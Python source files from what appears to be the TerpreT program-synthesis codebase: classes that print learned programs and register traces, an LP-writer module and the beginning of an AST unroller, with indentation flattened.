for r in range(self.num_registers):
self.print_reg("reg%%sVal_%i_%i" % (t, r), ex_id)
print("")
class UntypedMutableRegisterPrinter(MutableRegisterPrinter):
def __init__(self, prog_printer):
super(UntypedMutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % '', ex_id))
print(' %s = %s' % args)
class TypedMutableRegisterPrinter(MutableRegisterPrinter):
def __init__(self, prog_printer):
super(TypedMutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % 'Ptr', ex_id),
self.str_for_var(reg_name_template % 'Int', ex_id),
self.str_for_var(reg_name_template % 'Bool', ex_id))
print(" %s = (Ptr %s, Int %s, Bool %s)" % args)
class OutputPrinter(object):
def __init__(self, prog_printer):
self.prog_printer = prog_printer
def str_for_var(self, var, ex_id):
return dist_to_str(self.prog_printer.data_printer.get_value(get_for_ex(self.prog_printer.var_data[var], ex_id)))
def run(self, ex_id):
print('Output:')
self.print_output_reg(ex_id)
for ptr in range(self.prog_printer.stack_size):
args = (ptr, self.str_for_var('outputListVal_%d' % ptr, ex_id))
print('outputList[%d] = %s' % args)
class TypedOutputPrinter(OutputPrinter):
def __init__(self, prog_printer):
super(TypedOutputPrinter, self).__init__(prog_printer)
def print_output_reg(self, ex_id):
reg_name_template = "outputReg%sVal"
args = (self.str_for_var(reg_name_template % 'Ptr', ex_id),
self.str_for_var(reg_name_template % 'Int', ex_id),
self.str_for_var(reg_name_template % 'Bool', ex_id))
print("outputReg = (Ptr %s, Int %s, Bool %s)" % args)
class UntypedOutputPrinter(OutputPrinter):
def __init__(self, prog_printer):
super(UntypedOutputPrinter, self).__init__(prog_printer)
def print_output_reg(self, ex_id):
print('outputReg = %s' % self.str_for_var('outputRegVal', ex_id))
class ProgramPrinter(object):
def __init__(self, par_prob_bound, data, hypers):
self.data_printer = ProbDataPrinter(par_prob_bound)
self.data = data
self.hypers = hypers
self.var_data = data['variables']
self.input_stack_size = hypers['inputStackSize']
self.input_num = hypers['inputNum']
raw_solution = data['variables']
self.solution = {k: raw_solution[k].value for k in raw_solution.keys()}
def str_for_var(self, var, ex_id):
return dist_to_str(self.data_printer.get_value(get_for_ex(self.var_data[var], ex_id)))
class CombinatorPrinter(ProgramPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorPrinter, self).__init__(par_prob_bound, data, hypers)
self.prefix_length = hypers['prefixLength']
self.lambda_length = hypers.get('lambdaLength', 0)
self.suffix_length = hypers['suffixLength']
self.max_loop_steps = self.input_stack_size + self.prefix_length
self.stack_size = 1 + self.input_stack_size + self.prefix_length \
+ self.max_loop_steps * (1 + self.lambda_length) + self.suffix_length
self.is_mutable_model = 'extraRegisterNum' in hypers
self.stack_printer = StackPrinter(self)
def stmt_to_str(self,
par_template,
immutable_reg_name=None,
arg_pp=None):
if arg_pp is None:
arg_pp = self.data_printer.register_dist_to_string
# Determine where the result is written to:
if self.is_mutable_model:
out_data = self.solution.get(par_template % 'Out', None)
stmt_str = arg_pp(out_data) + " <- "
eol = ";"
else:
stmt_str = "let %s = " % immutable_reg_name
eol = " in"
instr_dist = self.solution[par_template % '']
instr_str = dist_to_str(self.data_printer.get_cmb_instruction(instr_dist))
arg_dists = [self.solution[par_template % 'Arg1'],
self.solution[par_template % 'Arg2'],
self.solution[par_template % 'Condition']]
instr_arity = 3
if instr_str in ["nil", "one"]:
instr_arity = 0
elif instr_str in ["inc", "dec", "cdr", "car", "noop"]:
instr_arity = 1
elif instr_str in ["cons", "add", "eq", "gt", "and", "or"]:
instr_arity = 2
if instr_str == "ite":
stmt_str += "if %s then %s else %s" % (arg_pp(arg_dists[2]),
arg_pp(arg_dists[0]),
arg_pp(arg_dists[1]))
else:
stmt_str += instr_str
for arg_idx in range(instr_arity):
stmt_str = stmt_str + " " + arg_pp(arg_dists[arg_idx])
return (stmt_str + eol)
def print_program(self):
# Inputs:
for i in range(self.input_num):
if self.is_mutable_model:
print("r%i <- Input();" % i)
else:
print ("let r%i = Input() in" % i)
# Prefixes:
for i in range(self.prefix_length):
print(self.stmt_to_str("prefixInstructions%%s_%i" % i, "r%i" % (self.input_num + i)))
# Combinator:
closure_stmts = []
for i in range(self.lambda_length):
if self.is_mutable_model:
closure_reg_pp = self.data_printer.closure_mutable_register_dist_to_string(self.input_num,
self.extra_register_num)
else:
closure_reg_pp = self.data_printer.closure_register_dist_to_string(self.input_num,
self.prefix_length,
i)
stmt_str = self.stmt_to_str("lambdaInstructions%%s_%i" % i,
"c%i" % i,
closure_reg_pp)
closure_stmts.append(stmt_str)
if self.is_mutable_model:
closure_return = "r%i" % (self.register_num - 1)
else:
closure_return = self.data_printer.register_dist_to_string(self.solution["lambdaReturnReg"], prefix="c")
closure_stmts.append(closure_return)
comb = dist_to_str(self.data_printer.get_combinator(self.solution['combinator']))
if comb == "foldli":
comb_args = self.data_printer.register_dist_to_string(self.solution["combinatorInputList1"]) + \
" " + self.data_printer.register_dist_to_string(self.solution["combinatorStartAcc"])
elif comb == "mapi":
comb_args = self.data_printer.register_dist_to_string(self.solution["combinatorInputList1"])
elif comb == "zipWithi":
comb_args = self.data_printer.register_dist_to_string(self.solution["combinatorInputList1"]) + \
" " + self.data_printer.register_dist_to_string(self.solution["combinatorInputList2"])
else:
comb_args = self.data_printer.register_dist_to_string(self.solution["combinatorInputList1"]) + \
" " + self.data_printer.register_dist_to_string(self.solution["combinatorInputList2"]) + \
" " + self.data_printer.register_dist_to_string(self.solution["combinatorStartAcc"])
comb_pp_args = (comb,
"\n ".join([""] + closure_stmts),
comb_args)
if self.lambda_length > 0:
comb_str = "%s (λ ele acc idx -> %s) %s" % comb_pp_args
else:
comb_str = "0"
if 'combinatorOut' in self.solution:
print("%s <- %s" % (self.data_printer.register_dist_to_string(self.solution['combinatorOut']),
comb_str))
else:
print("let r%i = %s" % (self.input_num + self.prefix_length, comb_str))
# Suffix:
for i in range(self.suffix_length):
print(self.stmt_to_str("suffixInstructions%%s_%i" % i,
"r%i" % (self.input_num + self.prefix_length + 1 + i)))
if self.is_mutable_model:
prog_return = "r%i" % (self.register_num - 1)
else:
prog_return = self.data_printer.register_dist_to_string(self.solution["programReturnReg"])
print(prog_return)
def print_trace(self, ex_id):
# Hyperparams:
print('Hyperparams:')
for (hpp, value) in self.hypers.iteritems():
print(' %s = %d' % (hpp, value))
print("")
self.stack_printer.run(ex_id)
self.register_printer.run(ex_id)
self.output_printer.run(ex_id)
class CombinatorTypedPrinter(CombinatorPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorTypedPrinter, self).__init__(par_prob_bound, data, hypers)
self.output_printer = TypedOutputPrinter(self)
class CombinatorTypedImmutablePrinter(CombinatorTypedPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorTypedImmutablePrinter, self).__init__(par_prob_bound, data, hypers)
self.register_printer = TypedImmutableRegisterPrinter(self)
class CombinatorTypedMutablePrinter(CombinatorTypedPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorTypedMutablePrinter, self).__init__(par_prob_bound, data, hypers)
self.register_printer = TypedMutableRegisterPrinter(self)
self.extra_register_num = hypers['extraRegisterNum']
self.register_num = hypers['inputNum'] + hypers['extraRegisterNum']
class CombinatorUntypedPrinter(CombinatorPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorUntypedPrinter, self).__init__(par_prob_bound, data, hypers)
self.output_printer = UntypedOutputPrinter(self)
class CombinatorUntypedImmutablePrinter(CombinatorUntypedPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorUntypedImmutablePrinter, self).__init__(par_prob_bound, data, hypers)
self.register_printer = UntypedImmutableRegisterPrinter(self)
class CombinatorUntypedMutablePrinter(CombinatorUntypedPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorUntypedMutablePrinter, self).__init__(par_prob_bound, data, hypers)
self.register_printer = UntypedMutableRegisterPrinter(self)
self.extra_register_num = hypers['extraRegisterNum']
self.register_num = hypers['inputNum'] + hypers['extraRegisterNum']
class AssemblyLoopPrinter(CombinatorPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyLoopPrinter, self).__init__(par_prob_bound, data, hypers)
self.loop_body_length = hypers['loopBodyLength']
self.register_num = hypers['inputNum'] + hypers['extraRegisterNum']
self.register_printer = UntypedMutableRegisterPrinter(self)
def print_program(self):
# Inputs:
for i in range(self.input_num):
print("r%i <- Input();" % i)
# Prefixes:
for i in range(self.prefix_length):
print(self.stmt_to_str("prefixInstructions%%s_%i" % i, "r%i" % (self.input_num + i)))
# Combinator:
closure_stmts = []
closure_reg_pp = self.data_printer.assembly_loop_register_dist_to_string(self.register_num)
for i in range(self.loop_body_length):
stmt_str = self.stmt_to_str("loopBodyInstructions%%s_%i" % i,
"c%i" % i,
closure_reg_pp)
closure_stmts.append(stmt_str)
comb = dist_to_str(self.data_printer.get_looptype(self.solution['loop']))
comb_args = self.data_printer.register_dist_to_string(self.solution["loopInputList1"])
if comb != "foreach":
comb_args += " " + self.data_printer.register_dist_to_string(self.solution["loopInputList2"])
comb_pp_args = (comb,
comb_args,
"\n ".join([""] + closure_stmts))
if self.loop_body_length > 0:
if comb == "foreach":
print("%s ele1 in %s:%s" % comb_pp_args)
else:
print("%s (ele1, ele2) in %s:%s" % comb_pp_args)
# Suffix:
for i in range(self.suffix_length):
print(self.stmt_to_str("suffixInstructions%%s_%i" % i,
"r%i" % (self.input_num + self.prefix_length + 1 + i)))
prog_return = "return r%i" % (self.register_num - 1)
print(prog_return)
class AssemblyLoopTypedPrinter(AssemblyLoopPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyLoopTypedPrinter, self).__init__(par_prob_bound, data, hypers)
self.stack_printer = StackPrinter(self)
self.output_printer = TypedOutputPrinter(self)
class AssemblyLoopUntypedPrinter(AssemblyLoopPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyLoopUntypedPrinter, self).__init__(par_prob_bound, data, hypers)
self.stack_printer = StackPrinter(self)
self.output_printer = UntypedOutputPrinter(self)
class AssemblyRegisterPrinter(object):
def __init__(self, prog_printer):
self.prog_printer = prog_printer
self.num_timesteps = prog_printer.hypers['numTimesteps']
self.num_registers = prog_printer.hypers['numRegisters']
def str_for_var(self, var, ex_id):
return dist_to_str(self.prog_printer.data_printer.get_value(get_for_ex(self.prog_printer.var_data[var], ex_id)))
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % (''), ex_id))
print(" %s = %s" % args)
def run(self, ex_id):
for t in range(self.num_timesteps + 1):
template = "Step t = %d, instr ptr = %s"
args = (t, self.str_for_var("instrPtr_%i" % t, ex_id))
if isinstance(self.prog_printer, AssemblyFixedAllocPrinter):
template += ":"
else:
template += ", stack ptr = %s:"
                args += (self.str_for_var("stackPtr_%i" % t, ex_id),)
print(template % args)
for r in range(self.num_registers):
self.print_reg("registers%%s_%i_%i" % (t, r), ex_id)
print("")
class AssemblyPrinter(ProgramPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyPrinter, self).__init__(par_prob_bound, data, hypers)
self.num_regs = hypers['numRegisters']
self.num_timesteps = hypers['numTimesteps']
self.register_printer = AssemblyRegisterPrinter(self)
def stmt_to_str(self, stmt_id):
# Determine where the result is written to:
out_data = self.solution["outs_%i" % stmt_id]
stmt_str = "%2i: %s <- " % (stmt_id, self.data_printer.register_dist_to_string(out_data))
instr_dist = self.solution["instructions_%i" % stmt_id]
instr_str = dist_to_str(self.data_printer.get_asm_instruction(instr_dist))
arg_dists = [self.solution["arg1s_%i" % stmt_id],
self.solution["arg2s_%i" % stmt_id]]
instr_arity = 2
if instr_str in ["nil", "one"]:
instr_arity = 0
elif instr_str in ["inc", "dec", "cdr", "car", "noop", "return"]:
instr_arity = 1
elif instr_str in ["cons", "add", "eq", "gt", "and", "or"]:
instr_arity = 2
branch_addr_str = dist_to_str(self.data_printer.get_value(self.solution["branchAddr_%i" % stmt_id]))
if instr_str == "jz" or instr_str == "jnz":
stmt_str = "%2i: %s %s %s" % (stmt_id,
instr_str,
self.data_printer.register_dist_to_string(arg_dists[0]),
branch_addr_str)
elif instr_str == "return":
stmt_str = "%2i: %s %s" % (stmt_id,
instr_str,
self.data_printer.register_dist_to_string(arg_dists[0]))
else:
stmt_str += instr_str
for arg_idx in range(instr_arity):
stmt_str += " " + self.data_printer.register_dist_to_string(arg_dists[arg_idx])
if "jz" in instr_str or "jnz" in instr_str:
stmt_str += " " + branch_addr_str
        print(stmt_str + ";")
def print_program(self):
# Inputs:
for i in range(self.input_num):
print("r%i <- Input();" % i)
# Program:
for i in range(self.hypers['programLen']):
self.stmt_to_str(i)
def print_trace(self, ex_id):
# Hyperparams:
print('Hyperparams:')
for (hpp, value) in self.hypers.iteritems():
print(' %s = %d' % (hpp, value))
print("")
#self.stack_printer.run(ex_id)
self.register_printer.run(ex_id)
#self.output_printer.run(ex_id)
class AssemblyFixedAllocPrinter(AssemblyPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyFixedAllocPrinter, self).__init__(par_prob_bound, data, hypers)
self.input_stack_size = hypers['inputStackSize']
self.stack_size = self.input_stack_size + self.num_timesteps + 1
self.output_printer = UntypedOutputPrinter(self)
def print_stack(self, ex_id):
print('Stack:')
for ptr in range(1, self.input_stack_size + 1):
args = (ptr,
self.str_for_var("inputStackCarVal_%i" % (ptr - 1), ex_id),
self.str_for_var("inputStackCdrVal_%i" % (ptr - 1), ex_id))
print(" stack[%i] = (Car %s, Cdr %s)" % args)
for ptr in range(self.input_stack_size + 1, self.input_stack_size + self.num_timesteps + 1):
args = (ptr,
self.str_for_var("stackCarValue_%i" % (ptr - self.input_stack_size - 1), ex_id),
self.str_for_var("stackCdrValue_%i" % (ptr - self.input_stack_size - 1), ex_id))
print(" stack[%i] = (Car %s, Cdr %s)" % args)
def print_trace(self, ex_id):
# Hyperparams:
print('Hyperparams:')
for (hpp, value) in self.hypers.iteritems():
print(' %s = %d' % (hpp, value))
print("")
self.print_stack(ex_id)
self.register_printer.run(ex_id)
self.output_printer.run(ex_id)
```
#### File: TerpreT/lib/ilp_utils.py
```python
import numpy as np
import re
import astunparse
import ast
import sys
import utils as u
import pdb
one_index_re = re.compile("[a-zA-Z0-9]+_(\d+)_<.+")
two_index_re = re.compile("[a-zA-Z0-9]+_(\d+)_(\d+)_<.+")
three_index_re = re.compile("[a-zA-Z0-9]+_(\d+)_(\d+)_(\d+)_<.+")
one_index_re2 = re.compile("[a-zA-Z0-9]+_(\d+)_?$")
two_index_re2 = re.compile("[a-zA-Z0-9]+_(\d+)_(\d+)_?$")
three_index_re2 = re.compile("[a-zA-Z0-9]+_(\d+)_(\d+)_(\d+)_?$")
shared_index_re2 = re.compile("\w+SH")
def index_dominates_old(index1, index2):
if index1 is None: return False
if index2 is None: return True
if len(index1) != len(index2):
return len(index1) < len(index2)
for i1, i2 in zip(index1, index2):
if i1 < i2: return True
elif i1 > i2: return False
return False
def index_dominates(index1, index2):
if index1 is None: return False
if index2 is None: return True
if len(index1) == 1 and len(index2) > 1: return True
if len(index2) == 1 and len(index1) > 1: return False
if len(index1) != len(index2):
return len(index1) < len(index2)
for i1, i2 in zip(index1, index2):
if i1 < i2: return True
elif i1 > i2: return False
return False
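# Ordering sketch: length-1 indices dominate longer ones; otherwise shorter
# indices win, then the comparison is lexicographic:
#   index_dominates((3,), (0, 1))    # => True (length-1 wins)
#   index_dominates((0, 2), (0, 5))  # => True (lexicographically smaller)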
def index_dominates2(index1, index2):
return not index_dominates(index1, index2)
def compare_indices(index1, index2):
if index1 is None and index2 is None: return 0
if index1 is None: return 1 # None is the worst
if index2 is None: return -1 # None is the worst
# length 1 comes first
if len(index1) == 1 and len(index2) > 1: return -1
if len(index2) == 1 and len(index1) > 1: return 1
for j in xrange(np.minimum(len(index1), len(index2))):
i1 = index1[j]
i2 = index2[j]
if i1 < i2: return -1
elif i1 > i2: return 1
if len(index1) < len(index2): return -1
if len(index2) < len(index1): return 1
return 0
class LPWriter(object):
def __init__(self):
self.equalities = []
self.variables = []
self.objectives = []
self.messages = []
self.constants = []
self.global_constants = []
self.runtime_function_declarations = []
self.runtime_functions = []
self.n_equations = 0
self.include_waitbar = True
self.message_sizes = {}
def extract_indices(self, local_marginal):
for pattern in [one_index_re, two_index_re, three_index_re]:
m = pattern.match(local_marginal)
if m is not None:
return tuple([int(d) for d in m.groups()])
return None
def extract_indices2(self, init_local_marginal):
local_marginal = init_local_marginal.split("<")[0]
local_marginals = local_marginal.split(",")
result = []
for local_marginal in local_marginals:
m = shared_index_re2.match(local_marginal)
is_shared = (m is not None)
for pattern in [one_index_re2, two_index_re2, three_index_re2]:
m = pattern.match(local_marginal)
if m is not None:
# print local_marginal, m.groups()
if not is_shared:
result.append(tuple([int(d) for d in m.groups()]))
else:
result.append(tuple([int(d)-1000 for d in m.groups()]))
#if m is not None:
#pdb.set_trace()
# result[-1] = tuple([-1000+x for x in result[-1]])
#if len(local_marginals) > 1:
# print init_local_marginal, result
# pdb.set_trace()
return result
def dominant_index(self, indices):
result = None
for index in indices:
if index_dominates(index, result):
result = index
return result
def dominant_index2(self, indices):
result = None
for index in indices:
if index_dominates(index, result):
result = index
return result
def add_equality(self, entries, target, n_eq):
entry_strs = []
indices = []
for entry in entries:
coeff, local_marginal, sum_over = entry
entry_strs.append("%s, '%s', '%s'" % (coeff, local_marginal, sum_over))
# indices.append(self.extract_indices(local_marginal))
indices.extend(self.extract_indices2(local_marginal))
if False and len(entries) == 1:
index = (-1, ) # np.inf, np.inf, np.inf)
else:
index = self.dominant_index(indices)
arg1 = "[(%s)]" % ("),(".join(entry_strs))
arg2 = target
result = "LP.addEquality(%s, %s, '%s') # %s -> %s" % (arg1, arg2, str(indices), str(indices), str(index))
result += " # %s" % (str(index))
self.equalities.append((index, n_eq, result))
self.n_equations += n_eq
return result
def add_variable(self, local_marginal, var_sizes, var_kind='Var'):
indices = self.extract_indices2(local_marginal)
if indices is None:
index = None
else:
index = self.dominant_index(indices)
result = "LP.addVariable('%s', [%s], kind='%s', label='%s') # %s" % (local_marginal, var_sizes, var_kind,str(indices),str(indices))
self.variables.append((index, result))
return result
def add_objective(self, local_marginal, expression):
result = "LP.addObjective('%s', '%s')" % (local_marginal, expression)
self.objectives.append(result)
return result
def add_message(self, local_marginal, expression, message_name, decl_size, group):
result = "message_indices['%s'] = LP.addObjective('%s', '%s', local_vals=local_vals)" % (message_name, local_marginal, expression)
self.messages.append(result)
self.message_sizes[message_name] = (group, decl_size)
return result
def add_constant(self, name, value):
if name.startswith("const_"):
name = name[len("const_"):]
# Matlab needs constants defined in two places
self.constants.append("LP.const['%s'] = %s;" % (name, value))
self.global_constants.append("%s = %s;" % (name, value))
def add_runtime_function(self, rtf):
rtf.decorator_list = []
self.runtime_function_declarations.append(astunparse.unparse(rtf))
self.runtime_functions.append('LP.rt.%s = %s' % (rtf.name, rtf.name))
def dump_boilerplate_top(self, indent=0):
self.write("import numpy as np", indent=indent)
self.write("from lp2matrix import LPCompiler", indent=indent)
self.write("import sys", indent=indent)
self.write("import time", indent=indent)
def dump_message_sizes(self, indent=0):
self.write("def messageSizes(local_vals=None):", indent=indent)
indent += 1
self.write("result = [{}, {}, {}]", indent=indent)
for key, pair in self.message_sizes.iteritems():
group, size = pair
self.write("result[%s]['%s'] = %s" % (group, key, size), indent=indent)
self.write("return result", indent=indent)
self.write()
def dump_make_LP_def(self, indent=0):
self.write("def makeLP(local_vals=None):", indent=indent)
self.write("LP = LPCompiler()", indent=indent + 1)
self.write("def Copy(a): return a", indent = indent + 1)
self.write("LP.rt.Copy = Copy", indent = indent + 1)
def dump_boilerplate_bottom(self, indent=0):
self.write("if __name__ == '__main__':", indent=indent)
self.write('LP = makeLP()', indent=indent + 1)
self.write('LP.save_to_mat(sys.argv)', indent=indent + 1)
def zero_one_index_offset(self):
""" This should return 1 if we expect 1-indexing, 0 if we expect 0-indexing"""
return 0
def dump_section(self, section_label, section, indent=0):
self.write("# " + section_label, indent=indent)
print_waitbar = self.include_waitbar and len(section) > 30
if print_waitbar:
self.write('t=time.time()', indent=indent)
progress = 0
progress_tick = int(len(section) / 30)
for s in section:
progress += 1
if print_waitbar and progress % progress_tick == 0:
self.write('print \'\\r [{0:30s}] {1:.1f}%%\'.format(\'-\' * int(%g), %g / 30. * 100.),' % (progress/float(len(section)) * 30., progress/float(len(section)) * 30.), indent=indent)
self.write(s, indent=indent)
self.write()
if print_waitbar:
self.write('print \'\\r [{0:30s}] {1:.1f}%\'.format(\'-\' * int(30), 30 / 30. * 100.),', indent=indent)
self.write('print " time for %s:", time.time()-t,"s"' % section_label, indent=indent)
def sort_equalities(self):
# this pre-sorting makes sure that the order of equalities with degenerate indices is always the same
presorted = sorted(self.equalities)
#presorted = self.equalities
self.equalities = sorted(presorted, cmp=lambda x, y: compare_indices(x[0], y[0]))
new_equalities = []
num_equalities = 0
for eq in self.equalities:
new_equalities.append(eq[2])# + " n=%s" % num_equalities)
num_equalities += eq[1]
self.equalities = new_equalities
def sort_variables(self):
# this pre-sorting makes sure that the order of variables with degenerate indices is always the same
presorted = sorted(self.variables)
#presorted = self.variables
self.variables = sorted(presorted, cmp=lambda x, y: compare_indices(x[0], y[0]))
self.variables = [pair[1] for pair in self.variables]
def dump(self, f=None, indent=0):
if f is None:
f = sys.stdout
self.f = f
self.dump_boilerplate_top(indent=indent)
self.dump_section('Global Constants', self.global_constants, indent=indent)
self.dump_section('Runtime Functions', self.runtime_function_declarations, indent=indent)
#self.dump_message_sizes(indent=indent)
self.dump_make_LP_def(indent=indent)
self.write()
self.sort_equalities()
self.sort_variables()
indent += 1
self.dump_section('Constants', self.constants, indent=indent)
self.dump_section('Runtime Functions', self.runtime_functions, indent=indent)
self.dump_section('Declarations', self.variables, indent=indent)
self.dump_section('Equalities', self.equalities, indent=indent)
self.dump_section('Objectives', self.objectives, indent=indent)
#self.write("message_indices = {}", indent=indent)
#self.dump_section('Messages', self.messages, indent=indent)
#self.write("return LP, message_indices", indent=indent)
self.write("return LP", indent=indent)
self.write()
self.write()
indent -= 1
self.dump_boilerplate_bottom(indent=indent)
def dump_objective(self, f=None, indent=0):
if f is None:
f = sys.stdout
self.f = f
self.dump_boilerplate_top(indent=indent)
self.write("def makeObjective(LP, local_vals=None):", indent=indent)
indent += 1
self.write("LP.clearObjective()", indent=indent)
self.dump_section('Objectives', self.objectives, indent=indent)
self.write("message_indices = {}", indent=indent)
self.dump_section('Messages', self.messages, indent=indent)
self.write("return message_indices", indent=indent)
def write(self, data="", indent=0):
self.f.write(indent * " " + data + "\n")
class CaseNode(object):
def __init__(self, var_name, val):
self.var_name = var_name
self.val = val
self.switch_groups = []
self.parent_group = None
self.factors = []
self.declarations = []
self.constants = []
self.runtime_functions = []
self.unhandled = []
self.local_marginals = {}
def children(self):
return filter(lambda x: isinstance(x, CaseNode), self.body)
def set_body(self, body):
self.body = body
def add_switch_group(self, group):
self.switch_groups.append(group)
def add_declaration(self, decl):
self.declarations.append(decl)
def add_constant(self, const):
self.constants.append(const)
def add_runtime_function(self, rtf):
        # rtf.decorator_list = []
self.runtime_functions.append(rtf)
def is_observed(self, decl):
for factor in self.factors:
if factor.var_name == decl.name and factor.is_observation():
return True, factor.arg_names[0]
return False, None
def is_constant(self, decl):
for factor in self.factors:
if factor.var_name == decl.name and factor.is_constant():
return True, factor.arg_names[0]
return False, None
def add_factor(self, factor):
self.factors.append(factor)
def eval_constant(self, str_rep):
literal_value = None
try:
literal_value = int(str_rep)
except ValueError:
for const in self.constants:
if const.name == str_rep:
literal_value = const.value
# Didn't find in local scope. Go up a level.
if self.parent_group is not None and self.parent_group.parent_case is not None:
literal_value = self.parent_group.parent_case.eval_constant(str_rep)
assert literal_value is not None, "unable to eval constant " + str_rep
return literal_value
def resolve_variable(self, name):
for decl in self.declarations:
if decl.name == name:
return decl
# Didn't find in local scope. Go up a level.
if self.parent_group is None or self.parent_group.parent_case is None:
assert False, "Unable to resolve variable " + name
return self.parent_group.parent_case.resolve_variable(name)
def __repr__(self):
return "CaseNode[%s]" % (self.context_str())
def make_local_marginals(self, declarations):
for decl in declarations:
# name = "mu[%s]_%s" % (self.context_str(), decl.name)
name = self.to_local_marginal(decl)
self.local_marginals[decl.name] = name
return self.local_marginals
def to_local_marginal(self, declaration):
return "%s_<%s>" % (declaration.name, self.context_str())
def is_global_case(self):
return self.parent_group is None
def gate_value_local_marginal_and_value(self, val=None):
if val is None:
val = self.val
return "%s_<%s>" % (self.var_name, self.ancestor_context_str()), val
#return "mu[%s]_%s(%s)" % (self.ancestor_context_str(), self.var_name, self.val)
def get_local_marginal(self, var_name):
return self.local_marginals[var_name]
def idx(self):
if self.parent_group is None:
return "X"
else:
return self.parent_group.idx()
def ancestor_context_str(self):
if self.parent_group is None:
return ""
elif self.parent_group.parent_case is None:
return ""
else:
return self.parent_group.parent_case.context_str()
def context_str(self, val=None, eval=False):
if self.parent_group is None:
return ""
elif self.parent_group.parent_case is None:
return ""
else:
ancestry_context_str = self.ancestor_context_str()
if val is None:
val = self.val
cur_context_str = "%s=%s#%s" % (self.var_name, val, self.idx())
            if ancestry_context_str == "":
return cur_context_str
else:
return "%s,%s" % (ancestry_context_str, cur_context_str)
def num_switch_groups(self):
return len(self.switch_groups)
class SwitchGroup(object):
def __init__(self, var_name, idx_val):
self.var_name = var_name
self.cases = {}
self.parent_case = None
self.idx_val = idx_val
def add_case(self, val, case):
case.parent_group = self
self.cases[val] = case
def set_parent_case(self, case_node):
self.parent_case = case_node
def idx(self):
if self.parent_case is None:
assert False
else:
return self.parent_case.idx() + "," + str(self.idx_val)
def ghost_local_marginal(self, var_name):
context_str = self.parent_case.context_str() + "," + self.var_name
return "%s_<%s=@#%s>" % (var_name, context_str, self.idx())
def __repr__(self):
return "SwitchGroup(%s#%s)" % (self.var_name, self.idx())
def validate(self):
switch_decl = self.parent_case.resolve_variable(self.var_name)
num_cases = self.parent_case.eval_constant(switch_decl.size)
cases_are_covered = np.zeros(num_cases, dtype=bool)
for case in self.cases:
case = self.parent_case.eval_constant(case)
assert case < num_cases, "switch case out of bounds %s: %s (size=%s)" % (self, case, num_cases)
cases_are_covered[case] = True
assert np.all(cases_are_covered), "not all cases covered for %s: %s" % (self, np.nonzero(1 - cases_are_covered))
class Declaration(object):
def __init__(self, assign_node, case_node):
self.parse(assign_node)
self.context = case_node
#self.is_observed, self.observed_value = case_node.is_observed(self)
#self.is_constant, self.constant_value = case_node.is_constant(self)
def __repr__(self):
return "Declaration(%s, %s, %s, %s)" % (self.name, self.kind, self.size,
self.context.context_str())
def parse(self, assign_node):
if len(assign_node.targets) > 1: return False
if u.is_constant_definition(assign_node):
return None
self.name = assign_node.targets[0].id
rhs = assign_node.value
if isinstance(rhs, ast.Call):
call_node = u.cast(rhs, ast.Call)
self.parse_call(call_node)
self.array_size = None
elif isinstance(rhs, ast.Subscript):
subscript_node = u.cast(rhs, ast.Subscript)
call_node = u.cast(subscript_node.value, ast.Call)
self.parse_call(call_node)
self.array_size = u.get_index(subscript_node)
def parse_call(self, call_node):
self.kind = call_node.func.id
self.size = u.name_or_number(call_node.args[0])
assert len(call_node.args) <= 1, "shouldn't have more than 1 arg to decl (how to define consts changed)"
class Constant(object):
def __init__(self, assign_node, case_node):
self.parse(assign_node)
self.context = case_node
def __repr__(self):
return "Constant(%s, %s, %s)" % (self.name, self.value,
self.context.context_str())
def parse(self, assign_node):
assert len(assign_node.targets) == 1
self.name = assign_node.targets[0].id
self.value = assign_node.value.n
```
#### File: TerpreT/lib/unroller.py
```python
from __future__ import print_function
import ast
import astunparse
import copy
import error
from error import check_type
import itertools
import sys
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def flat_map(f, l):
r = []
for e in l:
er = f(e)
if isinstance(er, list):
r.extend(er)
else:
r.append(er)
return r
class PartialEvaluator(ast.NodeTransformer):
def visit_FunctionDef(self, node):
for decorator in node.decorator_list:
self.visit(decorator)
return node
def visit_BinOp(self, node):
node = self.generic_visit(node)
if isinstance(node.left, ast.Num) and isinstance(node.right, ast.Num):
value = eval(compile(ast.copy_location(ast.Expression(body=node), node), '', 'eval'))
return ast.copy_location(ast.Num(n=value), node)
else:
return node
def visit_BoolOp(self, node):
node = self.generic_visit(node)
allBoolLit = True
for value in node.values:
allBoolLit = allBoolLit and isinstance(value, ast.Name) and (value.id == "True" or value.id == "False")
if allBoolLit:
value = eval(compile(ast.copy_location(ast.Expression(body=node), node), '', 'eval'))
return ast.copy_location(ast.Name(id=value, ctx=ast.Load()), node)
else:
return node
def visit_Compare(self, node):
node = self.generic_visit(node)
allNum = isinstance(node.left, ast.Num)
for comparator in node.comparators:
allNum = allNum and isinstance(comparator, ast.Num)
if allNum:
value = eval(compile(ast.copy_location(ast.Expression(body=node), node), '', 'eval'))
lit = ast.copy_location(ast.Name(id=str(value), ctx=ast.Load()), node)
return ast.copy_location(lit, node)
else:
return node
def visit_If(self, node):
node.test = self.visit(node.test)
#Make sure to only recursively visit things that we are going to keep:
if isinstance(node.test, ast.Name):
if node.test.id == True or node.test.id == "True":
#Flatten lists:
res = []
for stmt in node.body:
new_stmt = self.visit(stmt)
if isinstance(new_stmt, list):
res.extend(new_stmt)
else:
res.append(new_stmt)
node.body = res
return node.body
elif node.test.id == False or node.test.id == "False":
#Flatten lists:
res = []
